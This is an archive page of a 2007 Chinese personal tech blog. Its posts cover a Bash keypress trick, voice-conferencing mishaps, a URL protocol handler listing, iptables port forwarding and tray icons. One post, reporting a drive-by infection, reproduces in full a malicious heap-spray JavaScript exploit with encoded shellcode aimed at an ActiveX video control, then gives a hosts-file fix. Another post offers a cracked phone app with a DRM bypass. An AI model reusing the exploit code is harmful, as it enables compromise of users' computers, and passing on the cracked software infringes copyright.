老师布置的UNIX Shell作业,有一个很瓜的问题,要实现Press anykey to continue,网上搜索了一下,大部分都是复杂的实现,鬼话连篇,其实Bash下用read就可以实现任意键继续,语法为:
>/dev/null read -n 1
-n 1参数的意思是:读取一次按键,而不是一行。
为什么要把>/dev/null 放在最前面呢?因为read -n 1>/dev/null会被bas错误理解为:把标准输出(stdout,输出句柄为1)重定向到/dev/null。
2007年11月 存档
[shellscript]Bash下实现任意键继续 Press anykey to continue
2007年11月24日,星期六以后再也不搞语音会议了
2007年11月23日,星期五11-8日,电子科大 淤泥论坛@栋力无限 诞生,传说最高在线700人;11-12日,BBS被学校保卫处副处长和谐。
11-16日,网管会SynX Studio例会召开,尝试了基于XMPP的VoIP语音会议,结果是相当糟糕的,TipicIM在2003年就被收购终止开发了,Ignite Realtime的东西是基于该死的Java的,唯一寄予希望的是PSI分支Jabbin,可惜Jabbin语音质量相当差,而且一结束语聊就出错退出。开会的时候,还是紧急启用了GTalk,但是会议室是WiFi上网,分到192.168.x.x的内网IP,所以不能通过DrCom拨号上网,只能通过HTTP代理,GTalk的VoIP能力大打折扣。加上GTalk语聊是mutex的,所以必须同时开启2个以上的GTalk。开会的时候,我的GTalk窗口无情的死掉了……
11-23日,SynX Studio例会。这次我们选用的是NetMeeting,在一台公网IP上建立会议,然后让其他参会同学连接。结果……我无意中通过3389 Remote Desktop登录了那台NetMeeting服务器……由于3389登录会自动禁用系统声卡并启用3389的虚拟声音设备,所以NetMeeting立即永久性丧失了语聊功能……
Skype没有推出for Intranet版本,所以直接放弃。
以后再也不搞语音会议了
Mind mapping
2007年11月21日,星期三最近尝试了几乎世界上所有的MindMapper软件,发现没有一款适合我。
可能是我的思维和绝大多数人不一样吧,绝大多数MindMapper软件都是一个中心,引出一点,然后引出另一点,然后另一点……
我的思维完全不同,先是冒出很多个node,然后通过network把这些node结合起来,有可能一个network变成一个新的node,或者几个node形成loop,甚至二维平面不能表现的loop,只有通过3D来想象……

一旦我开始BrainStorming,几乎没有东西能够结构化的记录我思考到的idea,只有通过hand script按照时间顺序记录basic threading line,所以我很多发散性idea都稍纵即逝。

或许我不会真正的mind mapping,wikipedia上介绍说,Mindmapping分以下步骤:
- Start in the center with an image of the topic, using at least 3 colors.
- Use images, symbols, codes, and dimensions throughout your Mind Map.
- Select key words and print using upper or lower case letters.
- Each word/image must be alone and sitting on its own line.
- The lines must be connected, starting From the central image. The central lines are thicker, organic and flowing, becoming thinner as they radiate out From the centre.
- Make the lines the same length as the word/image.
- Use colors – your own code – throughout the Mind Map.
- Develop your own personal style of Mind Mapping.
- Use emphasis and show associations in your Mind Map.
后来又听说了Concept Mapping,源于programming的东东,看来只有geeky的东西才适合我啊

在Concept Mapping中反而有很多我喜欢的概念,summarizing,key concept,relation,hierarchy,source,creation,transform,organize
等等~~我的希望:
真希望GTD系统,个人海量资料库(如OneNote)、MindMapper,日程日历,语义化tagging能够被一个界面整合到一起……
思维比较混乱,胡言乱语了一篇blog
或许,这是碳文明依赖硅文明,生命进化和分化的另一个开端?
URLProtocolView 看看你的windows有多少协议被注册了
2007年11月21日,星期三nirsoft出品,必属精品。URLProtocolView是nirsoft在2007年推出的一款软件,可以查看Windows内已经注册的Asynchronous Pluggable Protocols。
什么是Asynchronous Pluggable Protocols(APP)呢?举个例子,网页里点击一个eMule的超链接,
ed2k://|file|BBC.Planet.Earth.03of11.Fresh.Water.720p.Divx6.Ac3.avi|2302461952|bd651d4325e14182f101697e18f08391|/
系统是怎么启动eMule的呢?我们通过注册表可以看到HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ed2k\shell\open\command指向"D:\下载工具\eMule\EMULE.EXE" "%1"那么相当于我们在命令行里运行了>"D:\下载工具\eMule\EMULE.EXE" "|file|BBC.Planet.Earth.03of11.Fresh.Water.720p.Divx6.Ac3.avi|2302461952|bd651d4325e14182f101697e18f08391|/"。这就是APP。
APP可能导致很多安全隐患,例如几个月前沸沸扬扬的Mozilla URI漏洞
扫描了一下,我的Vista下莫道不消魂注册的APP是相当的多啊。
================================================== URL Name : callto Status : Enabled Description : URL:Callto Protocol Command-Line : "D:\\Chat\\Skype\\Skype.exe" "/callto:"%l"" Product Name : Skype Company Name : Skype Technologies S.A. ==================================================
================================================== URL Name : coll Status : Enabled Description : URLirectory Opus File Collection Command-Line : D:\\Downloads\\DOpusInstall\\Disk1\\data1\\dopusrt.exe / dde Product Name : Skype Company Name : Skype Technologies S.A. ==================================================
================================================== URL Name : ed2k Status : Enabled Description : URL: ed2k Protocol Command-Line : "D:\\下载工具\\eMule\\EMULE.EXE" "%1" Product Name : eMule Company Name : http://www.emule-project.net ==================================================
================================================== URL Name : Explorer.AssocProtocol.search-ms Status : Enabled Description : Windows Search Protocol Command-Line : %SystemRoot%\\Explorer.exe /separate,/idlist,%I,%L Product Name : Microsoft? Windows? Operating System Company Name : Microsoft Corporation ==================================================
================================================== URL Name : file Status : Enabled Description : URL:File Protocol Command-Line : %SystemRoot%\\Explorer.exe /separate,/idlist,%I,%L Product Name : Microsoft? Windows? Operating System Company Name : Microsoft Corporation ==================================================
================================================== URL Name : FirefoxURL Status : Enabled Description : Firefox URL Command-Line : D:\\浏览器~1\\FIREFOX\\FIREFOX.EXE -requestPending - osint -url "%1" Product Name : Firefox Company Name : Mozilla Corporation ==================================================
================================================== URL Name : ftp Status : Enabled Description : URL:File Transfer Protocol Command-Line : "C:\\Program Files\\Internet Explorer\\iexplore.exe" %1 Product Name : Windows? Internet Explorer Company Name : Microsoft Corporation ==================================================
================================================== URL Name : gopher Status : Enabled Description : URL:Gopher Protocol Command-Line : D:\\浏览器~1\\FIREFOX\\FIREFOX.EXE -requestPending - osint -url "%1" Product Name : Firefox Company Name : Mozilla Corporation ==================================================
================================================== URL Name : gtalk Status : Enabled Description : URL:Gopher Protocol Command-Line : "D:\\Chat\\Google Talk\\googletalk.exe" "/%1" Product Name : Google Talk Company Name : Google ==================================================
================================================== URL Name : http Status : Enabled Description : URL:HyperText Transfer Protocol Command-Line : "C:\\Program Files\\Internet Explorer\\iexplore.exe" - nohome Product Name : Windows? Internet Explorer Company Name : Microsoft Corporation ==================================================
================================================== URL Name : https Status : Enabled Description : URL:HyperText Transfer Protocol with Privacy Command-Line : "C:\\Program Files\\Internet Explorer\\iexplore.exe" - nohome Product Name : Windows? Internet Explorer Company Name : Microsoft Corporation ==================================================
================================================== URL Name : IE.FTP Status : Enabled Description : URL:File Transfer Protocol Command-Line : "C:\\Program Files\\Internet Explorer\\iexplore.exe" %1 Product Name : Windows? Internet Explorer Company Name : Microsoft Corporation ==================================================
================================================== URL Name : IE.HTTP Status : Enabled Description : URL:HyperText Transfer Protocol Command-Line : "C:\\Program Files\\Internet Explorer\\iexplore.exe" - nohome Product Name : Windows? Internet Explorer Company Name : Microsoft Corporation ==================================================
================================================== URL Name : IE.HTTPS Status : Enabled Description : URL:HyperText Transfer Protocol with Privacy Command-Line : "C:\\Program Files\\Internet Explorer\\iexplore.exe" - nohome Product Name : Windows? Internet Explorer Company Name : Microsoft Corporation ==================================================
================================================== URL Name : IMTo Status : Enabled Description : IMToProtocol Command-Line : "D:\\Chat\\Tencent\\QQ2007\\Timwp.exe" "%1" Product Name : QQOneClickApp 应用程序 Company Name : ==================================================
================================================== URL Name : irc Status : Enabled Description : URL:IRC Protocol Command-Line : "D:\\Chat\\SysReset\\mirc.exe" -noconnect Product Name : mIRC Company Name : mIRC Co. Ltd. ==================================================
================================================== URL Name : joost Status : Enabled Description : URL:IRC Protocol Command-Line : "C:\\Program Files\\Joost\\xulrunner\\tvprunner.exe" "C:\\Program Files\\Joost\\application.ini" "%1" Product Name : Joost Company Name : Joost Technologies B.V. ==================================================
================================================== URL Name : lastfm Status : Enabled Description : URL:lastfm Command-Line : "D:\\Media\\Players\\last.fm\\LastFM.exe" "%1" Product Name : Last.fm Company Name : Last.fm ==================================================
================================================== URL Name : LDAP Status : Enabled Description : URL:LDAP Protocol Command-Line : "%ProgramFiles%\\Windows Mail\\wab.exe" "/ldap:%1" Product Name : Microsoft? Windows? Operating System Company Name : Microsoft Corporation ==================================================
================================================== URL Name : mailto Status : Enabled Description : URL:Mail Protocol Command-Line : "d:\\chat\\google talk\\googletalk.exe" /mailto %1 Product Name : Google Talk Company Name : Google ==================================================
================================================== URL Name : mapi Status : Enabled Description : URL:Mail Protocol Command-Line : "d:\\chat\\google talk\\googletalk.exe" /mailto %1 Product Name : Google Talk Company Name : Google ==================================================
================================================== URL Name : maze Status : Enabled Description : URL: maze Protocol Command-Line : "D:\\下载工具\\Maze\\Maze,1.exe" "%1" Product Name : Google Talk Company Name : Google ==================================================
================================================== URL Name : msdigitallocker Status : Enabled Description : URLigital Locker Protocol Command-Line : "%SystemRoot%\\DigitalLocker\\digitalx.exe" %1 Product Name : digital locker assistant Company Name : Microsoft Corporation ==================================================
================================================== URL Name : news Status : Enabled Description : URL:News Protocol Command-Line : "%ProgramFiles%\\Windows Mail\\WinMail.exe" / newsurl:"%1" Product Name : Microsoft(R) Windows(R) Operating System Company Name : Microsoft Corporation ==================================================
================================================== URL Name : nntp Status : Enabled Description : URL:NNTP Protocol Command-Line : "%ProgramFiles%\\Windows Mail\\WinMail.exe" / newsurl:"%1" Product Name : Microsoft(R) Windows(R) Operating System Company Name : Microsoft Corporation ==================================================
================================================== URL Name : OneIndex Status : Enabled Description : Microsoft Office OneNote Protocol Handler for Windows Desktop Search Command-Line : "%ProgramFiles%\\Windows Mail\\WinMail.exe" / newsurl:"%1" Product Name : Microsoft(R) Windows(R) Operating System Company Name : Microsoft Corporation ==================================================
================================================== URL Name : OneNote Status : Enabled Description : URL:OneNote Protocol Command-Line : D:\\PROGRA~2\\MICROS~2\\Office12\\ONENOTE.EXE / hyperlink "%1" Product Name : Microsoft Office OneNote Company Name : Microsoft Corporation ==================================================
================================================== URL Name : picasa Status : Enabled Description : Picasa Command protocol Command-Line : "D:\\Program Files\\Picasa2\\Picasa2.exe" "%1" Product Name : Picasa Company Name : Google Inc. ==================================================
================================================== URL Name : pnm Status : Enabled Description : RealNetworks 流协议 Command-Line : D:\\Media\\Players\\RealPlayer\\RealPlay.exe "%1" Product Name : RealPlayer (32-bit) Company Name : RealNetworks, Inc. ==================================================
================================================== URL Name : ppstream Status : Enabled Description : URL:ppstream Protocol Command-Line : "D:\\Networks\\PPStream\\PPStream.exe" -ppstream %1 Product Name : Company Name : PPStream.com ==================================================
================================================== URL Name : QSK Status : Enabled Description : QSKProtocol Command-Line : "D:\\Chat\\Tencent\\QQ2007\\Timwp.exe" "%1" Product Name : QQOneClickApp 应用程序 Company Name : ==================================================
================================================== URL Name : RealPlayer.AutoPlay.6 Status : Enabled Description : RealPlayer MP3/VCD 自动播放 Command-Line : D:\\Media\\Players\\RealPlayer\\RealPlay.exe /autoplay "%1" Product Name : RealPlayer (32-bit) Company Name : RealNetworks, Inc. ==================================================
================================================== URL Name : RealPlayer.CDBurn.6 Status : Enabled Description : RealPlayer 空白 CD 自动播放 Command-Line : D:\\Media\\Players\\RealPlayer\\RealPlay.exe /burn "%1" Product Name : RealPlayer (32-bit) Company Name : RealNetworks, Inc. ==================================================
================================================== URL Name : rlogin Status : Enabled Description : URL:RLogin Protocol Command-Line : url.dll,TelnetProtocolHandler %l Product Name : RealPlayer (32-bit) Company Name : RealNetworks, Inc. ==================================================
================================================== URL Name : rtsp Status : Enabled Description : 实时流协议 Command-Line : D:\\Media\\Players\\RealPlayer\\RealPlay.exe "%1" Product Name : RealPlayer (32-bit) Company Name : RealNetworks, Inc. ==================================================
================================================== URL Name : search-ms Status : Enabled Description : Windows Search Protocol Command-Line : %SystemRoot%\\Explorer.exe /separate,/idlist,%I,%L Product Name : Microsoft? Windows? Operating System Company Name : Microsoft Corporation ==================================================
================================================== URL Name : skype Status : Enabled Description : URL:Skype Protocol Command-Line : "D:\\Chat\\Skype\\Skype.exe" "/uri:%l" Product Name : Skype Company Name : Skype Technologies S.A. ==================================================
================================================== URL Name : snews Status : Enabled Description : URL:Snews Protocol Command-Line : "%ProgramFiles%\\Windows Mail\\WinMail.exe" / newsurl:"%1" Product Name : Microsoft(R) Windows(R) Operating System Company Name : Microsoft Corporation ==================================================
================================================== URL Name : synacast Status : Enabled Description : URL:synacast Protocol Command-Line : "D:\\Networks\\SynaLive\\PE.exe" -peer -url "%1" Product Name : Company Name : ==================================================
================================================== URL Name : telnet Status : Enabled Description : URL:Telnet Protocol Command-Line : url.dll,TelnetProtocolHandler %l Product Name : Company Name : ==================================================
================================================== URL Name : Tencent Status : Enabled Description : Tim Protocol Command-Line : "D:\\Chat\\Tencent\\TM2008\\Bin\\Timwp.exe" "%1" Product Name : QQ Company Name : TENCENT ==================================================
================================================== URL Name : Thunderbird.Url.mailto Status : Enabled Description : Thunderbird URL Command-Line : "D:\\Networks\\ThunderbirdPortable\\App\\thunderbird \\thunderbird.exe" -osint -compose "%1" Product Name : Thunderbird Company Name : Mozilla Corporation ==================================================
================================================== URL Name : Thunderbird.Url.news Status : Enabled Description : Thunderbird (News) URL Command-Line : "D:\\Networks\\ThunderbirdPortable\\App\\thunderbird \\thunderbird.exe" -osint -mail "%1" Product Name : Thunderbird Company Name : Mozilla Corporation ==================================================
================================================== URL Name : tn3270 Status : Enabled Description : URL:TN3270 Protocol Command-Line : url.dll,TelnetProtocolHandler %l Product Name : Thunderbird Company Name : Mozilla Corporation ==================================================
================================================== URL Name : TSBuddy Status : Enabled Description : URL:TN3270 Protocol Command-Line : D:\\Chat\\Tencent\\QQ2006\\SBuddyCall.exe %1 Product Name : Thunderbird Company Name : Mozilla Corporation ==================================================
================================================== URL Name : webcal Status : Enabled Description : URL:Webcal Protocol Command-Line : "%ProgramFiles%\\Windows Calendar\\wincal.exe" / webcal "%1" Product Name : Microsoft? Windows? Operating System Company Name : Microsoft Corporation ==================================================
================================================== URL Name : WindowsCalendar.UrlWebcal.1 Status : Enabled Description : URL:Webcal Protocol Command-Line : "%ProgramFiles%\\Windows Calendar\\wincal.exe" / webcal "%1" Product Name : Microsoft? Windows? Operating System Company Name : Microsoft Corporation ==================================================
================================================== URL Name : WindowsMail.Url.Mailto Status : Enabled Description : URL:Mail Protocol Command-Line : "%ProgramFiles%\\Windows Mail\\WinMail.exe" / mailurl:"%1" Product Name : Microsoft(R) Windows(R) Operating System Company Name : Microsoft Corporation ==================================================
================================================== URL Name : WindowsMail.Url.news Status : Enabled Description : URL:News Protocol Command-Line : "%ProgramFiles%\\Windows Mail\\WinMail.exe" / newsurl:"%1" Product Name : Microsoft(R) Windows(R) Operating System Company Name : Microsoft Corporation ==================================================
================================================== URL Name : WindowsMail.Url.nntp Status : Enabled Description : URL:NNTP Protocol Command-Line : "%ProgramFiles%\\Windows Mail\\WinMail.exe" / newsurl:"%1" Product Name : Microsoft(R) Windows(R) Operating System Company Name : Microsoft Corporation ==================================================
================================================== URL Name : WindowsMail.Url.snews Status : Enabled Description : URL:Snews Protocol Command-Line : "%ProgramFiles%\\Windows Mail\\WinMail.exe" / newsurl:"%1" Product Name : Microsoft(R) Windows(R) Operating System Company Name : Microsoft Corporation ==================================================
================================================== URL Name : WLMail.Url.Mailto Status : Enabled Description : URL:Mail Protocol Command-Line : C:\\Program Files\\Windows Live Mail desktop \\wlmail.exe /mailurl:"%1" Product Name : Microsoft(R) Windows(R) Operating System Company Name : Microsoft Corporation ==================================================
================================================== URL Name : WLMail.Url.news Status : Enabled Description : URL:News Protocol Command-Line : C:\\Program Files\\Windows Live Mail desktop \\wlmail.exe /newsurl:"%1" Product Name : Microsoft(R) Windows(R) Operating System Company Name : Microsoft Corporation ==================================================
================================================== URL Name : WLMail.Url.nntp Status : Enabled Description : URL:NNTP Protocol Command-Line : C:\\Program Files\\Windows Live Mail desktop \\wlmail.exe /newsurl:"%1" Product Name : Microsoft(R) Windows(R) Operating System Company Name : Microsoft Corporation ==================================================
================================================== URL Name : WLMail.Url.snews Status : Enabled Description : URL:Snews Protocol Command-Line : C:\\Program Files\\Windows Live Mail desktop \\wlmail.exe /newsurl:"%1" Product Name : Microsoft(R) Windows(R) Operating System Company Name : Microsoft Corporation ==================================================
================================================== URL Name : WMP11.AssocProtocol.MMS Status : Enabled Description : URL:mms Protocol Command-Line : "%ProgramFiles%\\Windows Media Player\\wmplayer.exe" "%L" Product Name : Microsoft? Windows? Operating System Company Name : Microsoft Corporation ==================================================
================================================== URL Name : WPC Status : Enabled Description : URL:Windows Parental Controls URL Exemption Request Protocol Command-Line : %systemroot%\\system32\\wpcer.exe %1 Product Name : Windows Company Name : Microsoft Corporation ==================================================
iptables实现TCP端口转发
2007年11月20日,星期二无聊,想把一个外网的mms在线视频转到内网看,于是在一台debian服务器上做了mms流端口(TCP端口554)转发,用的iptables。
其实我本来不会iptables的,一位前辈指点了一下一火就会了。iptables的本质是三张表,过滤表,改IP头的nat表和修改ttl值的表。其中我们实现端口转发的就是nat表。原理很简单,把所有请求本机TCP 554端口的转向远程外网服务器的554端口,然后把本机返回给内网的IP头改成本机IP。
使用iptables之前先 apt-get update, apt-get dist-update更新系统内核。
iptables -t nat -A PREROUTING -p tcp --dport 554 -j DNAT --to-destination 某外网IP:554
iptables -t nat -A POSTROUTING -p tcp --dport 554 -j SNAT --to-source 本机IP
echo 1 > /proc/sys/net/ipv4/ip_forward
看起来很简单,但是要记住还是很难的。
w3c-org.com病毒爆发
2007年11月19日,星期一最近上cnBeta、Blueidea老是出现TheWorld假死,任务栏出现读取 http://www.w3c-org.com/0614.html 的信息……当时就感觉中马了。
结果果然中了,Heap Overflow
<SCRIPT language="JavaScript">
var expires = new Date();
expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
var set_cookie = document.cookie.indexOf("3Ware="
;
if (set_cookie == -1){document.cookie = "3Ware=1;expires=" + expires.toGMTString
();
document.write('<object id="gl" classid="clsid:F3E70CEA-956E-49CC-B444-73AFE593A
D7F"></object>'
;
var helloworld2Address = 0x0c0c0c0c;
var shellcode = unescape("%u10eb%u4b5b%uc933%ub966%u029a%u3480%ufe0b%ufae2%u05eb
%uebe8%uffff%u17ff%ufcc4%ufefe%u94a1%ua7ce%u759a%u75ff%uf2be%u8e75%u53e2%u9675%u
75f6%u9409%ua7f9%u2416%ufeff%u1cfe%ube07%uc67e%u8b3d%u7704%udab8%u9196%ufe90%u96
fe%u8c8b%u9392%u94aa%ua7ff%uf875%u5e16%ufeff%u6bfe%u4a16%ufeff%u73fe%uc940%ufeff
%ua9fe%u0196%ufefe%u01fe%ufaa8%u39fd%ufe39%u80a2%ud080%ube39%u9bfa%u9b86%ua9fe%u
a801%ucdf6%uad25%ua9ad%ub873%uaec6%u01ad%ue2a8%u9294%u9096%u9a8a%uaa92%uff94%u75
a7%u16f8%uffa7%ufefe%u1675%ubefd%u75c2%ue2b6%u8675%ufdd2%u9a03%ueb75%ufece%ufefe
%u6c75%ufe56%ufefe%u0f96%udbb3%u962b%ub30f%u2bdb%u3796%ua0ac%u01ad%u6aca%ub871%u
39d6%ud2b8%u7fb3%uefce%u4696%ufecc%u96fe%uce46%ufefe%u4696%ufed7%u75fe%u6afa%ub9
9e%uf9c7%ufc8a%u071c%u8077%u9fce%u4696%uffe1%u96fe%ueb46%ufeff%u4696%ufe0e%u75fe
%u6afa%uc7b9%u8af9%u1cfc%u7707%uca80%ufe94%u9b96%ucd92%u96cc%u9b95%u908c%u94aa%u
a7ff%uf875%u2c16%ufefe%u75fe%ufd26%uc2be%u3e7d%u75e6%u9686%u05fd%u817d%ufeee%u8b
8a%ub175%ufdf2%u7f35%u90c7%u9a8a%u8b92%u759d%ufdd1%u7d15%ufe83%u8afe%u75a7%ufebb
%uba73%ufce6%u37cd%u40f1%uc4ee%u8a28%u3ff6%uf937%u34fd%u15be%uc50f%ud6b0%ue48b%u
d59e%ufdd1%uee91%uaaae%ufa94%ufa94%u01ab%ue6a8%u01a6%uce88%ubb71%u9ffe%ue315%ub0
c5%u8bd2%u9ee6%ud1d5%u91fd%uaeee%u94aa%u94fa%uabfa%ua801%ua6e6%u8801%u71ca%ufebb
%u7d9f%ufa3b%u5f15%u397d%u15ea%u757b%uea80%u94aa%u94fa%ua981%ua801%u39e6%u96f9%u
f4f6%ucdfe%u763e%ufab9%u0275%uec94%u55a7%u031c%u3998%udaba%uffc2%u75ff%u7302%uee
b9%uaea9%uafaf%uafaf%uafaf%u73af%uc978%ufeff%uaefe%ua801%u7ff2%u763a%ufeff%u3cfe
%ufede%ua801%u75ee%udaa8%ua5bf%ufdac%ufd1f%ufd1f%ufd1f%u7d1f%ufa12%uada4%u2475%u
091c%u01ac%uaf1e%u75a8%uc28b%u8a75%u86d0%u0bfd%u75a8%ude88%u0bfd%u37cd%ubfb7%ufd
53%ucd3b%uf125%uee40%u28c4%uf68a%u353f%ufdf9%ube24%u0f15%ue1c5%u198b%u75a0%udaa0
%u23fd%u7598%ub5f2%ua075%ufde2%u7523%u75fa%u3bfd%ua055%u3da7%u3f16%u0103%ucc01%u
6f8a%uc7f2%u831c%u877d%u18c7%u3766%u5842%u9d95%u2f77%u0eb1%u85b6%ue0c3%u9a5a%u7e
11%u5128%ub364%uce7f%ufeef%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe
%u96fe%u8a8a%uc48e%ud1d1%u8989%ud089%ucd89%ud39d%u8c91%ud099%u919d%ud193%ucd89%u
9bd0%u9b86%u00fe"
;
var hbshelloworld = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = hbshelloworld - (payLoadSize+0x3
;
var spraySlide = unescape("%u0c0c%u0c0c"
;
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (helloworld2Address - 0x100000)/hbshelloworld;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + shellcode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
var size_buff = 1070;
var x = unescape("%0c%0c%0c%0c"
;
while (x.length<size_buff) x += x;
gl.FlvPlayerUrl = x;
}
</SCRIPT>
<script>
if (set_cookie == -1){
location.reload();
}
</script>
网上搜索了一下应该是网关、IDC中了ARP病毒导致的。
补救办法:
Win+R运行 notepad %windir%\system32\drivers\etc\hosts
最后添加两行:
127.0.0.1 www.w3c-org.com 127.0.0.1 w3c-org.com
搞定。
系统托盘……常见图标
2007年11月18日,星期日几天没有关机,发现系统托盘就会出现大量的图标……
![]()
- FTPRush
- eMule
- uTorrent
- Orbit Downloader的嗅探器,用来下载flv的
- 用PuTTY自带的PLINK.exe实现SSH -D翻人比黄花瘦墙代理
- 迅雷
- Thunderbird
- Last.FM
- Windows Live Messenger
- Pandion,网管会几个兄弟做的电子科大内网(本部校园网+清水河内网)聊天软件,服务器是XMPP的Openfire
- Skype
- TM20008 Preview 2 这个狗p东西占内存太多了
- GTalk
- 电子科大校园网宽带登录用的DrCom
- 飞鸽传书
- Wakoopa,传说中软件SNS,有很大的侵犯隐私的嫌疑。
- OneNote托盘,非常方便的便签和截屏(Win+S)工具
- PicoStick 非常赞的便签,只有6K
- 电源、网络和音量,Vista自带
这些东西一共占了我1.04GB内存……
上面某些图标是通过HoeKey缩小到系统托盘的。
手机万能遥控器汉化破解版[适用于部分nokia机型]
2007年11月18日,星期日来源:中国孝感社区
红外遥控Psiloc irRemote v1.00.S60v3.SymbianOS9.1.Unsigned.Cracked-BiNPDA汉化破解版
此软件可以遥控彩电,功放,DVD,CD,录像机等多种品牌家电设备,(当然手机必须有红外线功能哦!),
Features
irRemoteirRemote turns your phone into a universal remote control. irRemote allows to operate audio and video equipment using one device - Symbian operated smartphone with infrared port.
PowerIt's simple and intuitive. Just select the device From the list and control it using your phone's keypad. The database of supported devices is stored online and you can download new codes directly From the irRemote.
WizardYou can extend the list of supported devices by uploading codes for them through an online wizard. Your uploaded codes can be downloaded directly From irRemote and ranked by other irRemote users.
适用机型:
Nokia 5500 Nokia E50 Nokia E51 Nokia E60
Nokia E61 Nokia E61i Nokia E65 Nokia E70
Nokia E90 Nokia N71 Nokia N73 Nokia N75
Nokia N80 Nokia N92 Nokia N93 Nokia N93i Nokia N95
安装说明:
按顺序安装第一个和第二个文件,,第三个文件签名后再安装,第四个文件是汉化文件,也要签名。
以下是摇控家电对照表
松下的TV 控制 国厂飞鸽空调的开关机
长虹的用TOSHIBA或philips 或 daewoo或LG或GOLDSTAR
老的破牡丹遥控器芯片是SAA3010飞利普的,选择 Philips 就可以
daewoo控制创维34,但不能控制29纯平100hz
TCL的可以用PHILLIPS控制
三洋的用户注意:部分机子可以用SANYO频道按钮开机后,再用SANYO ALT的电源按钮关机。
金星D3406FZ电视机用Philips
创维可以用LG ALT遥控或菲利普遥控
SHARP21寸的,SHARP开不了,但是第一个ADMIRAL就可以
厦华彩电Allsat TV
国产的日立_福日可以用日立的!只是有效距离太小,小于1米!
发射器牌号 发射器电器 遥控存储频道数 彩色中央处理器 (电脑块)
熊猫、北京 日本三菱 30个 M50436-560
M50462
适用机型:
熊猫3631B 3631D 3615D 4640
3642A 54P3 54L5 54P10 54P17
北京8313 8316 8343 2103C 541Y
牡丹49C1 51C5 54C3A 成都C47-851K
54-871 长虹CK49A 53A C2421
环宇47C-2R 51C-4R 54-2R
黄河47-V1 44FS-1 5401 5405 5406
5425 54FS-Ⅱ 海燕C54B-3-R
54B-4-R 如意SGC4400 5402A 福日
1425 1725 1824 1925 2025 2075
2125 2175 金星C451 542 543 C4717
凯歌4C4401 5101 514 飞跃47C21/2-6
49C2Y21-1 54C2Y2-1 54C2Y21-1
上海Z654-2A 654-4A 654-5A 656-5A
青岛5427 赣新KO5401 5406 5409
康佳T920D1 9538 1826 1926 2109 2110
2126 2128 孔雀KQ54-38 54-39 654-39
美乐DS44C-1 1808 4F3A2B1 51CD5A
54CD6 2108 2188B 乐华FC541-2PD
西湖51CD5A 54CD6 天鹅CS47-C3 54-S1
下载:
![]()
1[1].irRemote.Setup.SIGNED.Do.Not.Resign.rar
![]()
2[1].DRMCommonSolutions.SIGNED.Do.Not.Resign.rar
![]()
3[1].Crack.Unsigned.rar
![]()
4[1].Psiloc.irRemote.v1.00.S60v3.SymbianOS9.1.Unsigned.CHS-ken.rar
est注:以前看到有红外线接口的设备就想到:要是能遥控电视……


